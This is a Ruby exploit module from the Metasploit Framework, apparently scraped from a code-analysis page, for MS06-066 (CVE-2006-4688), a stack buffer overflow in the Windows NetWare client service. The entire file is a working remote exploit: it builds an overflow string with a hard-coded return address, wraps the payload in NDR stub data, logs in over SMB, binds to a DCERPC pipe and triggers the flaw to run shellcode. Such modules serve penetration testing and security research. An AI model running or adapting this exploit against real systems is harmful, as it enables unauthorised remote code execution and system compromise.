modules/exploits/windows/smb/ms06_066_nwwks.rb from rapid7/metasploit-framework

modules/exploits/windows/smb/ms06_066_nwwks.rb
Summary

Maintainability

6 hrs
Test Coverage

Issues
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MS06-066 Microsoft Services nwwks.dll Module Exploit',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the svchost service, when the netware
        client service is running. This specific vulnerability is in the nwapi32.dll module.
      },
      'Author'         => [ 'pusscat' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2006-4688'],
          [ 'OSVDB', '30260'],
          [ 'BID', '21023'],
          [ 'MSB', 'MS06-066'],

        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 1000,
          'BadChars' => "",
          'Compat'   =>
          {
            # -ws2ord XXX?
          },
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'Windows XP SP2',
            {
              'Ret'      => 0x616566fb, # modemui.dll   [esp + 16]: popaw, ret
            },
          ]
        ],

      'DefaultTarget' => 0,
      'DisclosureDate' => '2006-11-14'))

    register_options(
      [
        OptString.new('SMBPIPE', [ true,  "The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)", 'nwwks']),
      ])

  end

  def exploit
    # [in] [unique] wchar *
    # [in] [unique] wchar *
    # [out] long

    ofstring    = Rex::Text.to_unicode('\\\\') + rand_text(292) + [ target.ret ].pack('V') + "\x00\x00"
    stubdata =
      NDR.long(rand(0xffffffff)) +
        NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + "\x00") +
      NDR.long(rand(0xffffffff)) +
        NDR.UnicodeConformantVaryingStringPreBuilt(payload.encoded + "\x00\x00") +
      NDR.long(rand(0xffffffff)) +
        NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + "\x00") +
      NDR.long(rand(0xffffffff)) +
        NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + "\x00") +
        NDR.UnicodeConformantVaryingStringPreBuilt(ofstring)

    print_status("Connecting to the SMB service...")
    connect()
    smb_login()

    handle = dcerpc_handle('e67ab081-9844-3521-9d32-834f038001c0', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
    print_status("Binding to #{handle} ...")
    dcerpc_bind(handle)
    print_status("Bound to #{handle} ...")

    print_status("Calling the vulnerable function...")

    begin
      dcerpc.call(0x01, stubdata)
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
      print_status('Server did not respond, this is expected')
    rescue => e
      if e.to_s =~ /STATUS_PIPE_DISCONNECTED/
        print_status('Server disconnected, this is expected')
      else
        raise e
      end
    else
      print_status("Got #{dcerpc.last_response.stub_data.length} bytes: #{dcerpc.last_response.stub_data}")
    end

    # Cleanup
    handler
    disconnect

    if (dcerpc.last_response != nil and
      dcerpc.last_response.stub_data != nil and
      dcerpc.last_response.stub_data == "\x04\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00")
      return true
    else
      return false
    end
  end
end